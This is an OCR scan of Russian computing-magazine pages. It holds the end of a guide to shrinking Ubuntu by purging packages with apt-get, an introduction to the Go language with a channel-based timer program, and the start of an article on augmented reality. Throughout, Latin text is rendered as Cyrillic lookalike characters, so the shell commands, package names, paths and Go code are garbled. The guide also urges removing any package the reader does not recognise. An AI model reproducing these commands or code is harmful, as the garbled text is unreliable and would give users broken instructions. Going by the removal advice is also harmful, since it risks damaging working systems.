ные программы, нонеимеющиесмысладля людей, не 
переваривающих социалыщину: 

$ біісіо ар1:-§е1: риг§е ешраііііу ешра1:Ііу-соттоп 
1:е1ера1:Ііу-\* §ыіЬЬег §ыіЬЬег-5егѵісе 

1 8 Мб долой. Можно еще удалить В ііТо гге пі- клиент 
Ігапзтіззіоп и браузер ЕгеЬх, но это уже кощунство 
и допустимо разве что в случае их за мен ы на йе Іи де 
и Ѳоодіе Сбготе. Теперь перейдем к меню «Эузіет 
Асітіпізігаііоп». В нем гораздо больше важных при- 
ложений, но все равно много ненужного. Например, я 
совершенно не понимаю назначения программы под 
названием Сотриіег 5 а п і 1; о г. Никогда еще она не на- 
ходила чего-то действительно бесполезного и никак не 
чистила систему. Соответственно, в топку: 

$ біісіо ар1:-§е1: риг§е сотріЩег- дапі1:ог\* 

Утилита выбора языка тоже довольно спорная програм- 
ма, в большинстве случаев абсолютно ненужная: 

$ біісіо ар1:-§е1: риг§е 1ап§иа§е-5е1ес1:ог 
1ап§иа§е-е1ес1:ог-соттоп 

Теперь поговорим о поддержке железа. Как я уже упо- 
минал в начале статьи, ІІЬипІи поддерживает огромное 
количество разнообразных железок, для каждой из 
которых в системе есть не только драйвер, занимающий 
несколько десятков килобайт, но и гораздо болеетяже- 
лая обвеска в виде различных демонов и приложений, 
работающих с этим драйвером. 

Так, например, ІІЬипІи оченьхорошо поддерживаеттех- 
нологию Віиеіооіб, для которой в системе есть и драй- 
вера, и демоны, и графические программы настройки. 
Вопрос только в том, нужен ли синезубый в наше время 
господства 36 и ѴѴі-Еі сетей. Думаю, что многим уже нет. 
Поэтому от поддержки Віиеіооіб в большинстве случаев 
можно отказаться: 

$ біісіо ар1:-§е1: риг§е Ь1иеі\* 



> СІѴСІ 

Для большего 
удобства мы собрали 
все необходимые 
команды в файл 
і гп_ 1 :оо_ 1 а 2 у_ 1 :о_ 1 :уре_ 
ііТхТ Вместо набора 
команд тебе будет 
достаточно делать 
сору’п’разіе. 




> іпіо 



• Не стоит бояться 
удалить какой-либо 
пакет, если ты не 
уверен, что он нужен 
кому-то еще. Утилита 
а рі-деі покажет 
список его зависимо- 
стей до удаления, и 
ты сможешь принять 
решение. 

• Чтобы кэш ска- 
чанных с помощью 
арі-деі пакетов не 
загромождал систему, 
его необходимо пе- 
риодически подчи- 
щать: зисіо ар1:-§е1: 
сіеап. 
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Куча дополнительных пакетов из-за одной простой программы 



Эта команда удалит не только реализацию В ІиеІооіЬ- прото кола, 
распространяемую в пакете Ыиег, но и все ее зависимости в виде 
д по те- библиотек и графических интерфейсов. Выигрыш скром- 
ный: 1 2 Мб. 

Далее, у тебя дома есть сканер? Если нет, то и поддержка сканеров 
в системе не нужна. В ІІЬипІи доступна простая программа для 
сканирования документов под названием Эітріе 5сап, она опира- 
ется на стандартную библиотеку для работы со сканерами 8АЫЕ. 
Удалив последнюю, мы удалим поддержку сканеров полностью: 

$ біісіо ар1:-§е1: риг§е НЬвапе 

Это даст нам дополнительные 1 5 Мб. Третье: принтер есть наверняка, 
и, скорее всего, он подключен к домашней машине, поэтому если ты 
чистишь ІІЬипІи, установленный на ноутбук, то отподдержки принте- 
ровтоже можно избавиться: 

$ біісіо ар1:-§е1: риг§е сирв сирз-соттоп брідз Мріір-сіаііа 
§5-Роп1і5 

Настал черед видеодрайверов. ІІЬипІи содержит полный комплект 
драйверов Хогд, но видеокарта у нас всего одна. Соответственно, 
все остальное можно удалить, но для этого придется сначала вы- 
яснить, какие драйвера поддерживаются железом, чтобы ненаро- 
ком не удалить нужный. Это можно сделать с помощью следующей 
команды: 

$ с а* /ѵаг/1о§/Хог§. 1о§.0 | §гер ' аи1:осоп1й§игесІ сігіѵег' 

Сразу после слова «Маісбеб» будетуказано имя драйвера, его 
нужно запомнить. При этом драйверов может быть несколько, это 
вполне нормально, и лучше оставить их все. Остальные можно 
удалить с помощью арі-деі. Просто набираем «арі-деі ригде 
хзегѵег-хогд-ѵібео-», два раза нажимаем <Еп1ег> и удаляем все 
по порядку, кроме тех имен, которые мы запомнили. Для примера 
можешь взять следующую команду, которая удаляет все драйвера, 
кроме 1"Ьбеѵ и ѵеза: 

$ біісіо ар1:-§е1: риг§е ХБегѵег-хог§-ѵісІео-{аріть а1:і, сбірз^ 
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іггііб і §еос1е, І128, 174Ѳ^ ігѵЬеІ , тасб64^ т§а ^ пеота§іс ^ поиѵеаи^ 
пѵ^ орепсбготе^ п128^ гасіеоп,, гепсІі1:іоп ^ бЗ ^ зЗѵіг^е, заѵа§е^ 
5І1ісопто1:іоп^ біб^ БІБизЬ^сІ-Рх^гісІепІі^Беп^^ ѵтыаге^ ѵоосіоо} 

Также можно потереть различные плюшки для драйверов пѴібіа и АТі: 

$ зисіо ар1:-§е1: риг§е пѵісІіа-\* -р^іпх-тосіаііазез гасіеопііооі 

А вместе с ними и заголовочные файлы ядра, которые в ІІЬипІи вклю- 
чены только для того, чтобы собирать и устанавливать модули для 
проприетарных видеодрайверов, но в обычной ситуации они нужны 
редко, а занимают90 Мб: 

$ зисіо ар1:-§е1: риг§е Ііпих-беасІегз-Х* 

В системе осталось еще немало различныхутилит и библиотек, 
специфичных для конкретныхжелезяк, но мы можем потратить весь 
день, разбираясь с каждой из них. Вместо этого мы избавимся от 
хлама, скрытого глубоко внутри системы. Например, сотріг’а (если, 
конечно, тебе не нужны эффекты рабочего стола): 

$ зисіо ар1:-§е1: риг§е сошрііХ* 

Систему синтеза речи также можно выбросить, она нужна людям, у 
которых проблемы со зрением: 

$ зисіо ар1:-§е1: риг§е езреак\* зреасб-сіізраіісбег §поше-гса 

Инструменты для разработчиков тоже, скорее всего, не нужны (ко- 
нечно, если ты сам не разработчик): 

$ зисіо ар1:-§е1: риг§е §сс-4.4 §сІЬ таке 

База данных соигсМЬ вместе с егіапд, используемая для хранения 
разной инфы в Опоте, также не нужна: 

$ зисіо ар1:-§е1: риг§е ег1ап§\* соигсМЬ 

Библиотека зтбеііепі:, используемая для доступа к виндовым 
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Ищем подходящий Хогд-драйвер 



шарам, не нужна на обособленных машинах (к тому же занимает 
больше 50 Мб): 

$ зисіо ар1:-§е1: риг§е зтЬсІіепІ: ІіпзтЬсІіпеІ: 

Не нужен нам и хиігиппег, используемый для создания XII Ь- 
интерфейсов: 

$ зисіо ар1:-§е1: риг§е хиігиппег-і.9.2 

Также можно подрезать следующий консольный софт: б с, Ьс, еб, 
ІТр, Ііір, рстсіиіііз, зсгееп, гзупс, зігасе, хіегт, ІзоТ, ѵѵЗт, Іеіпеі, 
Ісрбитр, ѵіт\*. При этом руководствоваться следует простым 
правилом: не знаешь, что это такое — значит, не нужно. 

Вроде это все. Теперь запустим о гр ба пег, чтобы он подчистил за 
нами оставшиеся зависимости: 

$ зибо огрбапег 

Смотрим количество свободного места: 

$ б-Р -б 

1 .4 Гб, команда «зибо би -зб /» выдаст более точные 1.3 Гб. Вы- 
читаем из них размер каталога /ѵаг (его можно получить так: «би 
-зб /ѵаг») и получаем 1.1 Гб. Почти двукратное снижение веса при 
сохранении полной работоспособности Споте, включая утилиты 
настройки, администрирования, установки и удаления пакетов, 
создания сетевых соединений. Также нам по-прежнему доступны 
браузер РігеРох, просмотрщик документов Еѵіпсе, файловый ме- 
неджер ІЧаиІіІиз, программа просмотра фотографий Еуе оР Споте 
и архиватор біе-гоііег. 

Но более того, мы можем освободить еще около 90 Мб простран- 
ства, если удалим документацию и ненужные л о кал и : 

$ зибо арТ-§е1: Іпз1:а11 1оса1ериг§е 

Отмечаем в списке «еп» и «еп_6В» (если мы работаем в англоязыч- 
ной версии ІІЬипІи), или «ги» и «ги_РІІ» (для русской версии). 



Запускаем программу: 

$ зибо 1оса1ериг§е 
Теперьудаляем документацию: 

$ зибо /изг/збаге/{бос^1:к-бос} 

Возвращение к истокам 

Теперь поговорим отом, что делать людям, которые не хотят видеть 
Споте на рабочем столе и хотели бы заменить его на что-нибудь 
более легкое. 

В случае с любым другим дистрибутивом рецепт был бы чрез- 
вычайно прост: удалить все пакеты, имеющие в названии слово 
дпоте, плюс зачистить о статки, удалив приложения и библиоте- 
ки. Но с ІІЬипІи этоттрюк не пройдет, в него встроена «защита от 
дурака», которая, если любой из пакетов, нарушающих работоспо- 
собность Споте, будет удален, принудительно установит пакет 
кибипіи-безкіор, тянущий за собой весь КОЕ (просто попытайся 
удалить дпоте, и ты увидишь, что арі-деі предложит для установ- 
ки). Поэтому полностью очистить ІІЬипІиотСпоте можно только 
двумя более-менее простыми способами: либо скачать ІІЬипІи 
Зегѵег и установить его в минимальной конфигурации, а затем 
доустановить все, что требуется, либо обойти систему защиты, 
удалив все дпоте-пакеты разом. Первый способ я разъяснять не 
буду, а вот про второй пару слов скажу. 

В ІІЬипІи просто огромное количество пакетов составляют среду 
О поте, вбивать их имена вручную ты будешь до вечера (а если 
читаешь это вечером, то до утра), поэтому я заранее подготовил 
список нужных пакетов и положил его на наш диск. Все, что требу- 
ется, — просто скопировать его содержимое как аргумент команды 
«арі-деі ригде». 

Выводы 

Описанная в статье методика очистки отлично работает и была не 
раз проверена автором. Конечно, мы могли бы добиться и более 
впечатляющих результатов, ужав ІІЬипІи вместе с Опоте мегабайт 
до 500, но для описания всех действий, необходимых для достиже- 
ния такой цели, понадобилась бы целая книга, т 
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СИ НА СТЕРОИДАХ 

Знакомимся с языком программирования 6о 

о Мы привыкли думать, что по-настоящему универсальных языков 
программирования не существует. Когда нам нужна эффективность - 
мы пишем на Си и миримся с его ограничениями. Когда нужна скорость 
разработки - кодим на РуЫмп и ожидаем получить медленный код. 
Егіапд позволяет создавать высокораспараллеленные распределенные 
приложения, но его очень трудно вписать в существующие проекты 



Языкбо полностью ломаеттакую систему мышления, сочетая всебе 
преимущества многих языков и освобождая программистов от их 
недостатков. 

Когда десять лет назад Кена Томпсона, принимавшего активное уча- 
стие в разработке языка Си, спросили, каким бы он сделал этотязык 
на тот момент, он ответил, что язык был бы похож на І_ітЬо. Прошло 
немало времени, и Томпсон совместно с еще одним автором языка Си, 
Робом Пайком, принял участие в создании Со — языка, который стал 
переосмыслением и последующим развитием І_ітЬо. 

Со был представлен миру 1 0 ноября 2009 года и практически сразу 
стал бестселлером. Одни только имена авторов, известных каксоз- 
датели операционной системы II N IX, языка программирования Си и 
кодировки ІЯР-8, а также покровительство Соодіе, в лабораториях 
которых был создан язык, дали Со отличный старт. Однако даже это не 



позволило бы языку долго продержаться на плаву, если бы он не смог 
предложить программистам что-то действительно новое — что-то, что 
упростило бы ихжизнь и сделало Со по-настоящему незаменимым. И 
это «что-то» в языке было. В большом количестве. 

Си сегодняшнего дня 

Создатели Со позиционируютсвое детище каксистемный язык, 
сочетающий в себе эффективность и скорость исполнения кода, на- 
писанного на Си, с простотой разработки на более высокоуровневых 
скриптовых языках, да еще и со встроенными средствами параллель- 
ного программирования. При этом внешне Со напоминает какую-то 
странную солянку из синтаксисов языков Си, Разсаіи АйА, что вкупе 
с приведенным описанием создает довольно сильное ощущение 
подвоха, почти такое же, какое возникает, когда слышишь о новой 
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мега-разработке пятигорских студентов. Однако оно 
быстро убывает, когда ты начинаешь изучать язык, и со- 
всем улетучивается, когда узнаешь отом, почему 6о стал 
именнотаким, какой он есть. 

В основу Оо положенотри фундаментальных идеи: 

1. Гарантия высокой скорости компиляции и производи- 
тельности приложений. 

2. Простота разработки и поддержки приложений, свой- 
ственная высокоуровневым скриптовым языкам. 

3. Встроенные средства параллельного программирова- 
ния, позволяющиезадействовать все имеющиеся ядра 
современных процессоров. 

Что все это значит на деле? Разберемся с каждым из 
пунктов. 

Производительность 

Даже очень простая референсная реализация компи- 
лятора с языка Оо способна за какие-то доли секунды 
сгенерировать на удивление быстрый код, скорость 
исполнения которого будет сопоставима со скоростью 
исполнения кода, написанного на таких языках, как Си и 
С++. При этом, в отличие отсвоих предков, компилятор 
Оо гарантирует проверкутипов, а результирующий код 
получает встроенный сборщик мусора и собственный 
механизм распараллеливания. 

С самого начала языкпроектировался таким образом, 
чтобы быть легко понятным и простым в «переваривании» 
нетолько человеку, но и машине. Многие синтаксические 
и архитектурные элементы Оо были задуманы если инее 
главной целью, то, по крайней мере, с оглядкой на возмож- 
ность их простого разбора программой, будьто компиля- 
тор, дебаггер или даже среда разработки. Язык получился 
очень прямолинейным и недопускающим неочевидностей 
и спорных мест, которые могли бы привести компиля- 
тор в замешательство (языкС++ — яркий примертакого 
неочевидного синтаксиса и общей механики, которые 
заставляют головы программистов трещать, а компилятор 
— медленно буксовать на месте]. 

Многие другие элементы языка, не имеющие прямого 
отношения к синтаксису, также были оптимизированы 
заранее. Например, язык не имеет механизма неявного 
приведения типов, что защищает программиста от оши- 
бок и позволяет сделать компилятор проще. В языке нет 
полноценной реализации классов с их наследованием и 
полиморфизмом. Механизм параллельного программи- 
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Результат работы программы после пяти ите- 
раций цикла 

рования использует собственную реализацию потоков 
внутри каждой программы, делающую потоки настолько 
легкими, что их создание обходится практически даром. 
Встроенный сборщик мусора также весьма проворен, в 
языке просто нет элементов, которые могли бы усложнить 
его работу. 

Простота разработки 
и сопровождения 

Оо — системный язык, что, тем не менее, не мешаетему 
быть достаточно высокоуровневым для того, чтобы обе- 
спечить программиста всем необходимым для комфорт- 
ного и быстрого написания кода. Языквключаетв себя 
такие высокоуровневые конструкции, какассоциативные 
массивы и строки (которые можно сравнивать, копиро- 
вать, вычислять длину, делать срезы). Он имеетсредства 
для создания собственныхтипов данных (подобных клас- 
сам в других языках), средства создания потоков и обмена 
данными между ними, и, конечноже, он лишен указателей, 
способных ссылаться на любой участок памяти (срыв стека 
в программе, написанной на Оо, невозможен в принципе]. 
Однако главное, что дает Оо программисту, это та самая 
прямолинейность и очевидность синтаксиса, о которой 
мы говорили в предыдущем разделе. В этом смысле Оо 
очень похожна языки Разсаі, Мобиіа и ОЬегоп: практиче- 
ски любой синтаксический элементязыка следуетобщей 
логике и может быть явно и безошибочно интерпретиро- 
ван вне зависимости отего положения в коде. Например, 
совершить знаменитую ошибку объявления переменных, 
описанную во всех гайдах по стилистике оформления 
кода на языке Си, в Оо просто невозможно: 



іпі:* а, Ъ; // В Си и С++ переменная "а" будет 
указателем, но "Ь" - нет 
ѵаг а, Ь 

// В Со обе переменные будут указателями 

Оо — язык, созданный программистами идля программи- 
стов. Это проявляется во всем, начиная отобрамления бло- 
ков кода в стиле Си, неявного объявления типов, отсутствии 
необходимости ста вить точку с запятой после каждого 
выражения и заканчиваятакими архитектурными реше- 
ниями, какотсутствие механизма исключений и полноцен- 
ных классов (они были созданы дляупрощенияжизни, но 
вместо этого приводят кзапутыванию кода). Основная идея 
языка в том, чтобы быть инструментом, который позволяет 




• Поддержку Оо пла- 
нируется включить 

в компилятор ОСС 
версии 4.6 

• В комплект Оо- 
компилятора входит 
утилита доіті:, позво- 
ляющая отформати- 
ровать исходный код 
по всем правилам. 

• В Оо допустимы 

множественные при- 
своения: \ = \ 
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• Оо РАО: доіапд.огд/ 
бос/до Іюд.ІЩппІ. . 

• Руководство 
6о-программиста: 

доіапд.огд/бос/ 
до ІиЩгіаІ.ЫппІ . 

• Руководство по 
эффективному 6о- 
программированию: 

доіапд.огд/бос/еібес- 
бѵе до.ЫппІ . 

• Как Оо управляет 
памятью: юіапд.огд/ 
бос/до тет.Ы:пп[ . 
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ѴѴеЬ-интерфейс для запуска простых 6о-приложений 



писать программы, вместо того, чтобы думать отом, заработаютли они 
вообще (эта черта свойственна Си и, в еще большей степени, С++). 

Средства параллельного 
программирования 

Встроенные средства параллельного программирования — это самая 
сильная черта Со, и здесь среди языков общего назначения ему 
просто нетравных (за исключением разве что ЫтЬо, но он привязан 
к ОС I пбегпо) . И выигрыш здесь не столько в том, что эти средства 
встроены в сам язык, сколько втом, что они реализуюточень простую 
и эффективную модель, полностью следующую теории взаимодей- 
ствующих последовательных процессов (С5Р). Читатели, знакомые с 
Оссат и ЫтЬо, должны хорошо понимать все преимущества С5Р, а 
для остальных поясню. Вместо того, чтобы городить огород из потоков, 
блокировок, мьютексов и прочих систем синхронизации, которые де- 
лают параллельное программирование невыносимой мукой и приво- 
дят к изданию многостраничных книг о том, как писать многопоточные 
приложения, автор СЗРТониХоар предлагает простое и элегантное 
решение: позволить приложению в любой момент создать новую нить, 
которая сможет общаться с родителем и другими нитями с помощью 
отправки синхронныхсообщений. 

В 6о эта идея выглядит так: 

1. Создание переменной-канала. 

2. Определение функции, которая принимаетпеременную-канал в 
качестве аргумента, а в своем теле содержит код, который должен 
быть выполнен в отдельной нити. В конце функция должна отправить 
результат своего выполнения в канал (это делается с помощью специ- 
ального оператора). 

3. Запускфункции в отдельном потоке с помощью ключевого слова «до». 

4. Чтение из канала. 

Функция ответвляется отосновного потока исполнения, который в это 
время переходит кожиданию данных в канале, результат исполнения 
функции отправляется в канал и основной поток получаетего. Просто, 
не так ли? Но как это будет выглядеть в коде? 

Пример 

Один из моих любимых примеров, демонстрирующих мощь языка 6о, 
— это реализация таймера, который выполняется в отдельном потоке 
и «стуч ит» основному потоку через определенные интервалы време- 
ни, втечение которых уходит в сон. Код этой программы, написанный 
на одном из «классических» языков программирования, выглядел 
бы громоздким и запутанным, но Со позволяет сделать его простым и 
красивым. 



Код нашей программы 

1 раскате шаіп 

2 

3 ішрогі: "іііте" 

4 ітрогі: "-Рті:" 

5 

6 -Рипс ііітег(сб сбап 5І:гіп§., пв, соипі: Іпі: ) { 

7 -Рог д := 1; і <= соипі:; д'++ { 

8 іііте. 51еер(іпі:64(п5)) 

9 д == соипі: { 

10 -Рті: . Ргіп1:-Р( " [ііітеп] Отправляю последнее 

сообщение. . . \п") 

11 сб <- "стоп ! " 

12 } еіве { 

13 -Рті: . Ргіп1:-Р( " [ііітеп] Отправляю. .. \п" ) 

14 сб <- "продолжаем" 

15 } 

16 -Рті: . Ргіпі:-Р( " [ііітеп] Отправил ! \п") 

17 } 

18 } 

19 

20 -Рипс таіп() { 

21 ѵаг бііг біігіп§ 

22 

23 сб := таке(сбап 5іігіп§) 

24 §о і:ітег(сб,, 1000000000,, 10) 

25 

26 -Рог { 

27 -Рті: . Ргіпіі-Р ( " [таіп] Принимаю. .. \п" ) 

28 бііг = <-сб 

29 і бііг == "стоп ! " { 

30 -Ртіі. Ргіпіі-Р (" [таіп] Принял последнее сообщение, 

завершаю работу. \п") 

31 геііигп 

32 } еіве { 

33 -Рті: . Ргіпіі-Р ("[таіп] Принято!\п") 

34 } 

35 } 

36 } 

Простейшая реализация этой программы заняла бы пятнадцать 
строк, но я намеренноусложнил ее, добавив вывод натерминал и 
условные выражения. Они помогут понять общий синтаксис языка и 
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В стандартную поставку Оо входят плагины для всех популярных сред программирования, в том числе Ѵіт 



механизм работы планировщика потоков бо. Вывод команды при- 
веден на скриншоте. На первый взгляд л истин г очень напоминает 
код программы, написанной на языке Си, С++ или даже Заѵа, но при 
более детальном изучении становятся видны различия — Ооунасле- 
довал отСи только базовый синтаксис, вто время какбольшинство 
ключевых слов и лексика изменились. 

Исходный код начинается с ключевого слова раскаде, следом за 
которым идет имя пакета, к которому этот код относится. Все за- 
пускаемые пользователем программы должны иметь имя таіп, тогда 
как библиотеки могут иметь произвольное имя, которое будет исполь- 
зовано для доступа кее функциям и переменным после импортиро- 
вания. При этом для пометки, должна ли функция или переменная 
быть экспортируемой, используется верхний регистр: все объекты, 
имена которых начинаются с большой буквы, будутэкспортированы, 
остальные останутся приватными. 

В строках 3 и 4 происходит импортирование пакетов б те и ітпі, 
функции которых понадобятся нам позже. Импортирование пакетов 
во многом очень похоже на включение в программу заголовочных 
файлов, как это делается в Си и С++, с тем исключением, что Оо, 
во-первых, следитза пространством имен и все импортированные 
функции, переменные и типы данных будут иметь префикс в виде 
имени пакета, а во-вторых, не требует наличия самих заголовочных 
файлов. Никакой возни с хидерами и пространством имен! 

Со строки 6 начинается описание функции бтегП нашего главного 
действующего лица. В последующем коде она будет отправлена в 
отдельный поток, и большую часть времени проведет во сне, а про- 
сыпаясь, будет отчитываться головному потоку. Чтобы сделать это, 
ей нужен доступ к каналу, поэтому первый аргумент функции — это сб 
типа «канал для передачи строк». Также ей нужно знать временной 
отрезок, втечение которого она можетспать, и то, сколько раз она 
сможет это сделать. Поэтому второй и третий аргументы — это пз и 
соипітипа іпС Обрати внимание на форму описания аргументов. В 
отличиеотСи, в Оо сначала идетимя переменной, илишьпосле — 
еетип (что логично и согласуется ссистемой мышления человека: 
«переменная та кая -то та ко го-то типа»). Тип возвращаемого функци- 
ей значения в Со следует помещать в конец, сразуза закрывающей 
скобкой (что, кстати, тоже логично). При этом, если функция должна 
возвращать несколько значений (в Оо это возможно), ихтипы и 
(опционально) имена должны быть перечислены через запятую и об- 



рамлены скобками. У нашей функции возвращаемого значения нет — 
уйдя в отдельный поток, она так или иначе ничего вернуть не сможет. 
Функция должна повторить процедуру «сон — отчет»указанное в 
переменной соипі число раз, поэтому в строке 7 начинается цикл Ьг, 
запись которого полностью аналогична своему собрату в языке Си, за 
исключением отсутствия скобок. 

Чтобы отправить потокбтег в сон мы используем функцию Эіеер 
(строка 8) из ранее импортированного пакета бте. Ее аргумент, 
задающий длительность сна, должен иметь тип іп164 (аналогичный 
типу Іопд в Си), поэтому мы должны использовать приведение типов, 
компилятор не сделает это за нас (и правильно, мы умнее). 

Чтобы головной потокзнал, когда потокбтегзавершится, и смог 
обработать эту ситуацию, бтег должен предупредить его. Поэтому в 
строках с 9 по 1 5 происходит проверка на достижение максимального 
числа повторений сна. Для этого используется стандартный оператор 
ф который со времен Си остался неизменным, но также, как и к>г, 
потерял скобки. Если это последнее повторение, на экран выводится 
«Отправляю последнее сообщение...», а в канал поступаетсообще- 
ние «Стоп!», в противном случае на экране появится «Отправляю 
сообщения...», а в канал пойдет«Продолжаем». Каналы в Оотипизи- 
рованы, поэтому в канал сЬ, объявленный с типом сбап зігіпд, можно 
отправить только строку (проверка типов в Оо осуществляется во 
время компиляции, поэтому ошибки легко отловить). 

В строке 1 6 поток подтверждает отправку сообщения с помощью 
печати строки «Отправил!» на экран. 

Как и в Си, в Оо индикатором начала программы является функция 
таіп (строки с 20 по 36), в рамках которой будет выполняться основ- 
ной поток. Все, что должна сделать наша функция таіп, это создать 
новый канал, передать его функции Стер отправить его в отдельный 
поток и ждать результатов. 

Чтобы получать сообщения из канала, понадобится переменная- 
приемник. Эту роль будет выполнять переменная зігтипа зігіпд, 
объявленная в начале функции с помощью ключевого слова ѵаг (ее 
значением автоматически станет піі, что эквивалентно І\ІІЛ_І_ в Си). 
Для создания канала используется встроенная функция такеП (стро- 
ка 23), которая просто выделяет память под указанный тип данных и 
инициализируетего нулевым значением. Кроме каналов с помощью 
таке можно создавать ассоциативные массивы и срезы, для вы- 
деления памяти используется пеѵѵ(). Мы не можем просто объявить 
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Список проектов, использующих язык Со, растет 
с каждым днем 



заблокирован, даже если в канале нет сообщения. Вместо этого в 
переменную ок будет за писано значение [а Ізе и работа потока про- 
должится. Естественно, дальше можно поместить проверку на «ок== 
Мае» и успеть выполнить какую-то полезную работу, а затем начать 
новую итерацию цикла и вновь попробовать получитьзначение. 
Кстати, таким же образом можно выполнить проверку в потоке- 
отправителе: 
ок := сб <- «Продолжаем» 

2 . Каналы в 6о могут быть буферизированы, то есть уметь накапли- 
ватьопределенное количество сообщений до того, какотсылающая 
сторона будетзаблокирована. Для этого достаточно всего лишьдо- 
бавить один дополнительный аргумент в вызов функции таке: 

сИ := таке(сІіап 5І:гіп§, 10) 

// создать канал с буфером в 10 позиций 



переменную типа сбап зігіпд и работать с ней, потому что буфер, ис- 
пользуемый для хранения передаваемых по каналу данных, не будет 
выделен. Также обрати внимание на неявное объявление перемен- 
ной сб, которое происходите помощью оператора «:=» (типизация 
при этом сохраняется, переменная будет иметь тип присваиваемого 
значения). 

В строке 24 Іітег наконец-то отправляется в отдельный поток. При- 
чем делается это с помощью одного-единственного ключевого слова 

-до- 

Теперь, когда Іітег был отправлен выполнять свое задание, головно- 
му потоку остается только ждать сообщений. Для приема сообщений 
из потока в 6о используется уже описанный ранее оператор «<-», 
который теперь следует направить «из потока в принимающую пере- 
менную»: 



Замечу, однако, что в нашей программе это не даст результата. Во 
время сна поток Іітег не сможет за пол нить канал сообщениями 
единомоментно, так как после каждого его засыпания управление 
все равно будет переходить головному потоку. 

3. В программу можно добавить одну или несколько функций и от- 
править их в отдельные потоки, тогда они будут спокойно работать 
совершенно параллельно, а когда таймер «прозвенит» заданное ко- 
личество раз, все они будут уничтожены вместе с головным потоком. 
Однако, если мы захотим получить результат от этих потоков через 
канал, то опять упремся в блокировки либо будем вынуждены делать 
множество проверок на наличие сообщений в каналах, какописано в 
первом пункте. Но этого можно избежать, если применить «оператор 
выбора ПОТОКОВ»: 



5* Г = < - СИ 

Но если бы мы добавили в код только одну эту строку, то головной 
поток продолжил бы работать после получения первого сообщения 
и в конце концов завершился, не обработав остальные сообщения. 
Поэтому нам нужен бесконечный цикл. Он занимает строки с 26 по 35. 
Оо не имеет в своем составе «настоящего» ѵѵбііе, поэтому, если требу- 
ется создать условный оператор цикла, то следует просто поместить 
условие после ключевого слова Іо г и не париться (или вообще ничего 
не указывать, как это сделал я). 

При каждой итерации цикла в переменную біг будетзаписывать- 
ся сообщение, пришедшее от потока Іітег, и, в зависимости от 
содержимого сообщения, будет выбираться тот или иной вариант 
дальнейших действий. Обрати внимание, язык позволяет спокойно 
сравнивать строки без всяких подсобных функций. Крометого, ты 
можешь получать их срезы и копии (на манер руібоп или гибу) и вы- 
числять длину с помощью ключевого слова Іеп (все это справедливо 
и в отношении массивов). 

Для запуска программы потребуется компилятор, который можно 
скачать с официального сайта языка (правда пока доступны только 
версии для II N IX, Р1ап9 и МасОЗХ). Если ставить его не хочется (или у 
тебя ѴѴіпсіоѵѵб), программу можно запустить, используя специальную 
форму на сайте доіапд.огд (правда, из-за ограничения на длитель- 
ность работы программы продолжительность сна потока Іітег при- 
дется сильно сократить). Это все. 

Постойте, но ведь 
это не многопоточность? 

Да, ты наверняка заметил, что из-за блокировок каналов даже на 
многоядерном процессоре одновременно активным будеттолько 
один поток нашей программы, тогда как другой будетждать отправку/ 
прием сообщения. Это действительно так, и для решения этой про- 
блемы Оо располагает рядом средств. 

1. Каналы можно проверять на наличие сообщений. Если строку 
«біг = <-сб» заменить на «біг, ок= < - с Ь » , то головной поток не будет 



Беіесі: { 

сазе Біг = < - сМІ : 

// обрабатываем сообщение от первого потока 
сазе Біг = <-сб2: 

// обрабатываем сообщение от второго потока 
саве Біг = <-сбЗ: 

// обрабатываем сообщение от третьего потока 

} 

Программа будетзаблокирована на операторе Беіесі; до того момен- 
та, пока в одном из каналов не появится сообщение. После этого бу- 
дет выполнен соответствующий блок. Чтобы после обработки одного 
сообщения Беіесі вновь переходил к прослушке каналов, его следует 
поместить внутрь бесконечного цикла. При этом, если в моменты 
между поступлениями сообщений потокдолжен выполнять какую-то 
работу, то ее следует поместить в блокбеіаиіі внутри Беіесі. 

Оператор Беіесі очень широко используется в Ѳо- 
программировании, именно сего помощью принято создавать «дис- 
петчеры сообщений», которые разветвляют программу на множество 
потоков сразу после старта, а затем входят в бесконечный цикл и 
начинают обработку пришедших от них сообщений. В операционной 
системе Іпіегпо (все приложения которой написаны на Ѳо-предке 
ЕітЬо)таким образом реализован многооконный графический 
интерфейс. 

Выводы 

Оо пока еще молодой, но очень перспективный язык, при создании 
которого был учтен более чем тридцатилетний опыт в области разра- 
ботки операционных систем и языков программирования (Роб Пайк 
двадцать летзанимался исследованиями в области многопоточного 
программирования, в течение которых были созданы языки Эдиеак, 
ЫеѵѵЭдиеак и ЫтЬо). 6о производителен, дружелюбен к программи- 
стам и красив. 

Освоив этотязык, ты сможешь писать программы, которые будут 
гораздо эффективнее всего того, что написано на традиционных 
языках программирования. ~аг 
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ПРОКАЧАЙ СВОЮ 
РЕАЛЬНОСТЬ! 

АидтеігіесІ геаШу для терминаторов и не только 

© Виртуальная реальность не раз описывалась в книгах, фильмах 
и СМИ. Но на практике полная виртуализация ощущений неудобна, 
ведь человек не может абсолютно отгородиться от реального мира. 
Сегодня мы поговорим о популярной концепции интерфейсов, объе- 
диняющей в себе реальные объекты с виртуальными - о дополнен- 
ной реальности. 



Хорошо забытое старое 

На самом деле идея дополненной реальности далеко нетак нова, 
как кажется. В боевых самолетах и танкахуже давно применяется 
нашлемная индикация, быстро и удобно совмещающая реальную 
панораму обзора со служебной информацией. 

Да что тут говорить — раритетные ѴН5-видеомагнитофоны и то были 
способны выводить направление перемотки и хронометраж поверх 
изображения. Бегущие информационные строки в новостях и всплы- 
вающие плашки с фамилиями при интервью — все это дополненная 
реальность в том или ином виде. Идея такого интерфейса — не за- 



менить реальный мир на поддельный, а дополнитьего элементами, 
облегчающими пользование и навигацию. Благодаря доступности 
компьютеров, ѵѵеЬ-камер и 6Р8-навигаторов в XXI веке модели по- 
добных интерфейсов получили широкое распространение в коммер- 
ческой и развлекательной сфере. 

Оснащенность мобильных телефонов необходимыми техническими 
средствами существенно расширила область применения ОР-кодов, 
сегодня их не печатают разве что на туалетной бумаге. Прижилось и 
активно используется сокращение АР — от английского Аид тепіеб 
Реаіііу. 
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■ ■ Радоі (заІіеМШтаіІ.ги) 




АК в истребителе 




Терминатор знал толк в АР 

Необходимое 

оборудование 

Дополненная реальность — общий термин, охватывающий широкий 
круг приложений. Каждое из них преследует свои цели и реализуется 
с помощью различныхтехнологий. В современной индустрии можно 
условно выделить два технологических направления. Первое — со- 
вмещение изображения, получаемого с камеры, с информацией, 
генерируемой на основе показаний различных датчиков, взаимодей- 
ствующих с реальным миром: например, компаса и 0Р8 навигатора. 
Такой тандем позволяет рассчитывать координаты объектов, попада- 
ющих в объектив, и получать для них дополнительные параметры. Это 
могут быть как простые отображения координат, направления дви- 
